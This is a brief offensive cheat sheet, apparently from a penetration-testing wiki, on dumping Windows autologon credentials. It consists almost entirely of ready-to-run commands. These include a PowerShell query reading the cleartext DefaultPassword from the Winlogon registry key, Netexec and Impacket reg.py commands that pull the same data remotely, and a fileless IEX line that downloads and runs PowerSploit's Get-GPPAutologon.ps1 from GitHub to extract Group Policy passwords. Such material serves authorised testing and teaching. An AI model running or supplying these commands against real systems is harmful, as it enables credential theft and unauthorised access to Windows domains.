PRIMARY CATEGORY → WINDOWS CREDENTIALS DUMPING
Abuse - Windows (Local)
Get-ItemProperty
Locally
Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' | Select DefaultDomainName, DefaultUsername, DefaultPassword | flAbuse - UNIX-like
Autologon must be configured via Group Policy instead of locally
Netexec
nxc smb '<TARGET>' --username '<USER>' --password '<PASSWD>' --module 'gpp_autologin'Impacket’s REG.py
reg.py query -keyName "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" '<DOMAIN>/<USER>:<PASSWD>@<TARGET>'Abuse - Windows
Autologon must be configured via Group Policy instead of locally
Get-GPPAutologon.ps1
Usage
- Fileless
IEX (New-Object Net.WebClient).downloadString('https://github.com/PowerShellMafia/PowerSploit/raw/refs/heads/master/Exfiltration/Get-GPPAutologon.ps1')- Touching Disk
IWR -UseBasicParsing -Uri 'https://github.com/PowerShellMafia/PowerSploit/raw/refs/heads/master/Exfiltration/Get-GPPAutologon.ps1' -OutFile '.\Get-GPPAutologon.ps1'Import-Module '.\Get-GPPAutologon.ps1'Usage
Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq